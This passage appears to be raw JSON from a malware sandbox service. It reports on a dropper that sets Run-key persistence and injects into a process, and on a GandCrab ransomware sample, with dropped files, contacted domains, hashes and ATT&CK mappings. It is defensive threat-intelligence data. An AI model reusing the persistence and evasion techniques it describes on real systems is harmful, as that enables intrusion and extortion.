\"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000009\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-60", "relevance": 10, "name": "PE file contains unusual section name", "description": "\"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303\" has a section named \".eh_fram\"\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303\" has a section named \".CRT\"\n \"085cda53603755dc.exe\" has a section named \".eh_fram\"\n \"085cda53603755dc.exe\" has a section named \".CRT\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"system\" (Source: f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303, API is part of module: MSVCRT.DLL)\n Found string \"shutdown\" (Source: f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303, API is part of module: WS2_32.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-8", "relevance": 10, "name": "Sample translates to unusual binary language", "description": "Russian (ID: 0x0419)", "origin": "Static Parser"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"085cda53603755dc.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")\n \"085cda53603755dc.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\"; Key: \"*SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00002876]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" wrote 16284 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303\" has section name .text with entropy \"6.12526528121\"\n \"085cda53603755dc.exe\" has section name .text with entropy \"6.12526528121\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "registry-9", "type": 3, "relevance": 7, "name": "Checks warning level of secure to non-secure traffic redirection", "description": "\"085cda53603755dc.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"WARNONHTTPSTOHTTPREDIRECT\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-136", "type": 3, "relevance": 3, "name": "Writes registry keys", "description": "\"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\"; Key: \"*SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"085cda53603755dc.exe\" marked \"C:\\f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"085cda53603755dc.exe\" opened \"C:\\f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 196)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 196)\n \"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 196)\n \"085cda53603755dc.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 224)\n \"085cda53603755dc.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 224)\n \"085cda53603755dc.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 224)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\" allocated memory in \"C:\\f1966f0e7d7a119acca8ec8c835c5bc82ef9f77d216c16f23fa2d36fd7c32303.exe\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
d77378dcc42b912e514d3bd4466cdda050dda9b57799a6c97f70e8489dd8c8d0
https://hybrid-analysis.com/sample/d77378dcc42b912e514d3bd4466cdda050dda9b57799a6c97f70e8489dd8c8d0
Hybrid Analysis - Ransomware
{"size": 187392, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "o.exe", "sha256": "d77378dcc42b912e514d3bd4466cdda050dda9b57799a6c97f70e8489dd8c8d0", "av_detect": 93, "vx_family": "Ransom.GandCrab4.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 3, "total_processes": 1, "total_signatures": 39, "extracted_files": [{"name": "ZFLXA-DECRYPT.html", "file_size": 66774, "sha256": "fb5f6c041ed4833ec9ab15266c78662d88078a334e271d8ecac60a7a5d4626ed", "type_tags": ["html"], "description": "HTML document, Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators", "runtime_process": "o.exe (PID: 1136)", "threat_level_readable": "no specific threat"}, {"name": "0YdED8h4YnKljVf.doc", "file_size": 258588, "sha256": "cda730001735e07dc0a81657d31a1a5a728946cd3c1dd46b242e7ddb11f4ab0b", "type_tags": ["data"], "description": "data", "runtime_process": "o.exe (PID: 1136)", "threat_level_readable": "no specific threat"}, {"name": "xulstore.json", "file_size": 1426, "sha256": "37ccae873f2484f49d38847f12c91af523ff084e65c69a7658e83ab8e3af9126", "type_tags": ["data"], "description": "data", "runtime_process": "o.exe (PID: 1136)", "threat_level_readable": "no specific threat"}, {"name": "ZFLXA-DECRYPT.html", "file_size": 66774, "sha256": "fb5f6c041ed4833ec9ab15266c78662d88078a334e271d8ecac60a7a5d4626ed", "type_tags": ["html"], "description": "HTML document, Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators", "runtime_process": "o.exe (PID: 1136)", "threat_level_readable": "no specific threat"}, {"name": "f5c2c82f-46fd-4d42-a968-97978822fc7a", "file_size": 1008, "sha256": "89969f90dd651ffa14af68a094754470548ab2f9683f985505478a4b1fa0f517", "type_tags": ["data"], "description": "data", "runtime_process": "o.exe (PID: 1136)", "threat_level_readable": "no specific threat"}, {"name": "1553114907600.6395efa4-e025-4686-8768-be417a45a55a.modules.jsonlz4", "file_size": 12324, "sha256": "46bab46a7429f82674ffbb87850f95e7e0dbb7d33d907d4f861590b6d9d7791e", "type_tags": ["data"], "description": "data", "runtime_process": "o.exe (PID: 1136)", "threat_level_readable": "no specific threat"}, {"name": "LICENSE.txt", "file_size": 1019, "sha256": "9ff65d59651606c92bde5db81da85f8b4d5303f2477fdbe38a1daf03c89885f8", "type_tags": ["data"], "description": "data", "runtime_process": "o.exe (PID: 1136)", "threat_level_readable": "no specific threat"}, {"name": "revocations.txt", "file_size": 47107, "sha256": "97e23d892d1adf6c214dbab6a1ced726baaa89467937bac10ecb08e74e3a23e8", "type_tags": ["data"], "description": "data", "runtime_process": "o.exe (PID: 1136)", "threat_level_readable": "no specific threat"}, {"name": "RevocationCacheFile.dat", "file_size": 1564, "sha256": "cbfd7e8d57944981eb40d35fa7c030f2835c7461225087eaf7c99ef30e0a71d5", "type_tags": ["data"], "description": "data", "runtime_process": "o.exe (PID: 1136)", "threat_level_readable": "no specific threat"}, {"name": ".metadata-v2", "file_size": 662, "sha256": "a3aafe7fe589f75e1e99c3386139aac20b52c2e105c986aa59d7bffd1e3c85ec", "type_tags": ["data"], "description": "data", "runtime_process": "o.exe (PID: 1136)", "threat_level_readable": "no specific threat"}, {"name": "6TNRAzWB1pG3.txt", "file_size": 101916, "sha256": "1ad73ea8549a8e75c77ff8625c3bb2cf6890bf45a670304809c67f94edac7039", "type_tags": ["unknown"], "description": "PGP\\011Secret Sub-key -", "runtime_process": "o.exe (PID: 1136)", "threat_level_readable": "no specific threat"}, {"name": "TM01793058_fn_Median_.dotx", "file_size": 58605, "sha256": "2b04118c62642c0d5781c190a52c9ded2664ed944ea6609a159a1aeb8bdf8c03", "type_tags": ["data"], "description": "data", "runtime_process": "o.exe (PID: 1136)", "threat_level_readable": "no specific threat"}, {"name": "recovery.jsonlz4", "file_size": 10300, "sha256": "d6589f6c32410b6837a8d52e098633b48238aeed8a940659ad32119aa76a0267", "type_tags": ["data"], "description": "data", "runtime_process": "o.exe (PID: 1136)", "threat_level_readable": "no specific threat"}, {"name": "3312185054sbndi_pspte.sqlite", "file_size": 238108, "sha256": "ac6dcd61feb92353d76cdc788ba5210d8f98ec27c2152ca0d593d07536fc77dc", "type_tags": ["data"], "description": "data", "runtime_process": "o.exe (PID: 1136)", "threat_level_readable": "no specific threat"}, {"name": "store.json.mozlz4", "file_size": 606, "sha256": "15a85cb39579bf85907cca0a4169e20471e017344647d64e8bc7fd41c3546458", "type_tags": ["data"], "description": "data", "runtime_process": "o.exe (PID: 1136)", "threat_level_readable": "no specific threat"}, {"name": "Normal.dotm", "file_size": 21057, "sha256": "30fab8c2b4a488d3532a9962c98be014580986b94d5e7953f31d34b518064c5a", "type_tags": ["unknown"], "description": "Unknown", "runtime_process": "o.exe (PID: 1136)", "threat_level_readable": "no specific threat"}, {"name": "TM01793060_fn_Origin_.dotx", "file_size": 53843, "sha256": "ba7cf4c3f6a0ef81c9ff3df6795c5e3f2f6c222ed005b04b6fcd238dac54a491", "type_tags": ["unknown"], "description": "Unknown", "runtime_process": "o.exe (PID: 1136)", "threat_level_readable": "no specific threat"}, {"name": "Built-In Building Blocks.dotx", "file_size": 4187847, "sha256": "7e84ed2d9e3784967576c8ab209758d4bc703114cdc3404e3509b8575c994b9c", "type_tags": ["unknown"], "description": "Unknown", "runtime_process": "o.exe (PID: 1136)", "threat_level_readable": "no specific threat"}, {"name": "TM01793064_fn_Equity_.dotx", "file_size": 32558, "sha256": "92e121bb9373971112df089766c9e681e75dc034056c47a4a2ed06ccc33c174a", "type_tags": ["unknown"], "description": "Unknown", "runtime_process": "o.exe (PID: 1136)", "threat_level_readable": "no specific threat"}, {"name": "TM01840907_fn_Equations_.dotx", "file_size": 52366, "sha256": "1119679242d91dcd5ce9e5c7aee862e236aa440c46be91bc63ffc1388ec0d18a", "type_tags": ["unknown"], "description": "Unknown", "runtime_process": "o.exe (PID: 1136)", "threat_level_readable": "no specific threat"}, {"name": "NormalOld.dotm", "file_size": 18518, "sha256": "49fc6e91319ed1b3a67c3a26727564cae428f849ef4efed63522690ec27ed3c4", "type_tags": ["unknown"], "description": "Unknown", "runtime_process": "o.exe (PID: 1136)", "threat_level_readable": "no specific threat"}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 12.00 (Visual Studio UNRELEASED) (build: 21005)", "1 .RES Files linked with CVTRES.EXE 12.00 (Visual Studio UNRELEASED)! (build: 21005)", "3 .ASM Files assembled with MASM 12.00 (Visual Studio UNRELEASED) (build: 21005)", "27 .CPP Files (with LTCG) compiled with CL.EXE 18.00 (Visual Studio UNRELEASED) (build: 21005)"], "imported_objects": ["21 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "97 .C Files compiled with CL.EXE 18.00 (Visual Studio UNRELEASED) (build: 20806)", "16 .ASM Files assembled with MASM 12.00 (Visual Studio UNRELEASED) (build: 20806)", "23 .CPP Files compiled with CL.EXE 18.00 (Visual Studio UNRELEASED) (build: 20806)"], "file_analysis": ["File contains C++ code", "File contains assembly code", "File appears to contain raw COFF/OMF content", "File was optimized using LTCG and/or POGO", "File is the product of a medium codebase (30 files)"], "total_file_compositions_imports": 206}, "processes": [{"uid": "00000000-00001136", "name": "o.exe", "normalized_path": "C:\\o.exe", "sha256": "d77378dcc42b912e514d3bd4466cdda050dda9b57799a6c97f70e8489dd8c8d0", "av_label": "Generic.Ransom.GandCrab4", "av_matched": 55, "av_total": 67}], "mitre_attcks": [{"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "parent": {"technique": "Indicator Removal on Host", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Credential Access", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Peripheral Device Discovery", "attck_id": "T1120", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "malicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Email Collection", "attck_id": "T1114.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114/001", "malicious_identifiers_count": 1, "parent": {"technique": "Email Collection", "attck_id": "T1114", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114"}}, {"tactic": "Collection", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}], "network_mode": "simulated", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"Global\\885BABB9E36E1507B5F3.lock\"\n \"Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\885BABB9E36E1507B5F3.lock\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:80\"\n \"<IPv4>:80\"\n \"<IPv4>:80\"", "origin": "Network Traffic"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-0", "type": 7, "relevance": 1, "name": "Contacts domains", "description": "\"500flats.com\"\n \"alatkeselamatankerja.co\"\n \"aldrovanaluxe.lviv.ua\"\n \"alem.be\"\n \"ananas.kiev.ua\"\n \"aurumwedding.ru\"\n \"babiceresa.com\"\n \"barvybud.com\"\n \"bellytobabyphotographyseattle.com\"\n \"bloghalm.eu\"\n \"canhoopalcity.top\"\n \"carillon7tanphu.com\"\n \"cocnguyetsanthaomeo.com\"\n \"devdev.com.br\"\n \"dutchtraditions.nl\"\n \"ecart.nu\"\n \"evotech.lu\"\n \"faculdadesenacpe.edu.br\"\n \"gofootball24h.com\"\n \"goodapd.website\"", "origin": "Network Traffic"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"o.exe\" touched file \"C:\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\\comctl32.dll\"\n \"o.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"\n \"o.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\dazuru[1].gif\"\n \"o.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\immeso[1].jpg\"\n \"o.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\BREQ4FKZ.htm\"\n \"o.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\deamhemehe[1].jpg\"\n \"o.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\X72GEHSB.htm\"\n \"o.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\sosoamseru[1].jpg\"\n \"o.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\EO298CVA.htm\"\n \"o.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\rusoesam[1].jpg\"\n \"o.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\9UV0TTH5.htm\"\n \"o.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\fukakekada[1].jpg\"\n \"o.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\7XT1H2YZ.htm\"\n \"o.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\momohe[1].jpg\"\n \"o.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\WFV53UIL.htm\"\n \"o.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\amfuzuhe[1].gif\"\n \"o.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\TUHEJLB6.htm\"\n \"o.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\QQW0X29Y\\63TMM885.htm\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"0YdED8h4YnKljVf.doc\" has type \"data\"\n \"xulstore.json\" has type \"data\"\n \"ZFLXA-DECRYPT.html\" has type \"HTML document Little-endian UTF-16 Unicode text with very long lines with CRLF line terminators\"\n \"f5c2c82f-46fd-4d42-a968-97978822fc7a\" has type \"data\"\n \"1553114907600.6395efa4-e025-4686-8768-be417a45a55a.modules.jsonlz4\" has type \"data\"\n \"LICENSE.txt\" has type \"data\"\n \"revocations.txt\" has type \"data\"\n \"RevocationCacheFile.dat\" has type \"data\"\n \".metadata-v2\" has type \"data\"\n \"6TNRAzWB1pG3.txt\" has type \"PGP\\011Secret Sub-key -\"\n \"TM01793058_fn_Median_.dotx\" has type \"data\"\n \"recovery.jsonlz4\" has type \"data\"\n \"3312185054sbndi_pspte.sqlite\" has type \"data\"\n \"store.json.mozlz4\" has type \"data\"", "origin": "Binary File"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"o.exe\" queries volume information of \"C:\\\" at 00000000-00001136-0000010C-2509417\n \"o.exe\" queries volume information of \"C:\\\" at 00000000-00001136-0000010C-2519244\n \"o.exe\" queries volume information of \"C:\\\" at 00000000-00001136-0000010C-2538057\n \"o.exe\" queries volume information of \"C:\\\" at 00000000-00001136-0000010C-2712414\n \"o.exe\" queries volume information of \"C:\\\" at 00000000-00001136-0000010C-2720385\n \"o.exe\" queries volume information of \"C:\\\" at 00000000-00001136-0000010C-2726228\n \"o.exe\" queries volume information of \"C:\\\" at 00000000-00001136-0000010C-2728359\n \"o.exe\" queries volume information of \"C:\\\" at 00000000-00001136-0000010C-2739393\n \"o.exe\" queries volume information of \"C:\\\" at 00000000-00001136-0000010C-2746094\n \"o.exe\" queries volume information of \"C:\\\" at 00000000-00001136-0000010C-7296095\n \"o.exe\" queries volume information of \"C:\\\" at 00000000-00001136-0000010C-7354386\n \"o.exe\" queries volume information of \"C:\\\" at 00000000-00001136-0000010C-7379742\n \"o.exe\" queries volume information of \"C:\\\" at 00000000-00001136-0000010C-7410849\n \"o.exe\" queries volume information of \"C:\\\" at 00000000-00001136-0000010C-7589138\n \"o.exe\" queries volume information of \"C:\\\" at 00000000-00001136-0000010C-7652334\n \"o.exe\" queries volume information of \"C:\\\" at 00000000-00001136-0000010C-7731315\n \"o.exe\" queries volume information of \"C:\\\" at 